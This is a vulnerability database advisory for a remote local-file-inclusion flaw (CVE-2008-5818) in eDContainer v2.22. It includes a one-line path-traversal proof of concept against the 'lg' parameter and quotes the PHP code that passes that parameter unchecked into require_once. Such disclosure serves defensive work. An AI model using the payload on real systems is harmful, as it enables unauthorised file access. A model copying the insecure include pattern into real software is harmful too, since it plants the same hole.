Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
eDContainer v2.22 (lg) Local File Inclusion Vulnerability
2009.01.05
Credit:
Anon
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2008-5818
CWE:
CWE-22
CVSS Base Score:
6.8/10
Impact Subscore:
6.4/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
Partial
Availability impact:
Partial
_____ ____ __ __ _ ____ ____ ____ |_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| | | | |_) | \ V / / _ \ | | _ | | | | | | | _ < | | / ___ \ | |_| | _ | |___ | |___ |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| eDContainer v2.22 (lg) Local File Inclusion Vulnerability Script : http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/e/ed/edscontacts/eDContainer_v222.zip Poc : /index.php?lg=../../../../index Vuln Code : File index.php if ( isset($_REQUEST['lg']) ) { $INDEX['currentLanguage'] = $_REQUEST['lg']; } else if ( !isset( $INDEX['currentLanguage'] ) ) { $INDEX['currentLanguage'] = $CONFIG['language']['default']; } require_once 'myContents_'.$INDEX['currentLanguage'].'.php'; ____ _ _ __ __ / ___| ___ | | __| | | \/ | | | _ / _ \ | | / _` | | |\/| | | |_| | | (_) | | |___ | (_| | | | | | \____| \___/ |_____| \__,_| _____ |_| |_| |_____|
References:
http://xforce.iss.net/xforce/xfdb/47609
http://www.securityfocus.com/bid/33026
http://www.milw0rm.com/exploits/7604
http://secunia.com/advisories/33335
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top